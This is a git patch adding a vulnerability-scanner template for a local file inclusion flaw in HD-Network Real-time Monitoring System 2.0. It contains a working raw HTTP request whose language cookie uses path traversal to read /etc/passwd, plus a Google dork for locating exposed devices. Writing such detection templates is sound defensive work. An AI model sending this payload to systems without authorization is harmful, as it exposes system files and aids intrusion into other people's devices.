From f52b1f0d551fd8aaf1ed80b2fb501d3029b3a232 Mon Sep 17 00:00:00 2001 From: Evan Rubinstein <70485623+evanRubinsteinIT@users.noreply.github.com> Date: Mon, 13 Dec 2021 05:01:48 -0500 Subject: [PATCH] Added New Vuln --- ...d-netowrk-realtime-monitor-system-LFI.yaml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 vulnerabilities/other/hd-netowrk-realtime-monitor-system-LFI.yaml diff --git a/vulnerabilities/other/hd-netowrk-realtime-monitor-system-LFI.yaml b/vulnerabilities/other/hd-netowrk-realtime-monitor-system-LFI.yaml new file mode 100644 index 0000000000..e477757dd3 --- /dev/null +++ b/vulnerabilities/other/hd-netowrk-realtime-monitor-system-LFI.yaml @@ -0,0 +1,33 @@ +id: hd-network-realtime-monitor-system-LFI + +info: + name: HD-Network Real-time Monitoring System 2.0 - Local File Inclusion + author: Evan Rubinstein + severity: critical + description: | + Instances of HD-Netowrk Real-time Monitoring System version 2.0 are vulnerable to a Local File Inclusion (LFI) vulnerability which allows remote unauthenticate attackers to view important, confidnetial information. Can be found by google dork: intitle:"HD-Network Real-time Monitoring System V2.0" + reference: + - https://www.exploit-db.com/exploits/50588 + tags: monitor,LFI,remote,unauthenticated + +requests: + - raw: + - | + GET /language/lang HTTP/1.1 + Referer: http://example.com + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36 + Cookie: s_asptitle=HD-Network%20Real-time%20Monitoring%20System%20V2.0; s_Language=../../../../../../../../../../../../../../etc/passwd; s_browsertype=2; s_ip=; s_port=; s_channum=; s_loginhandle=; s_httpport=; s_sn=; s_type=; s_devtype= + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Encoding: gzip,deflate,br + Host: {{BaseURL}} + Connection: Keep-alive + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file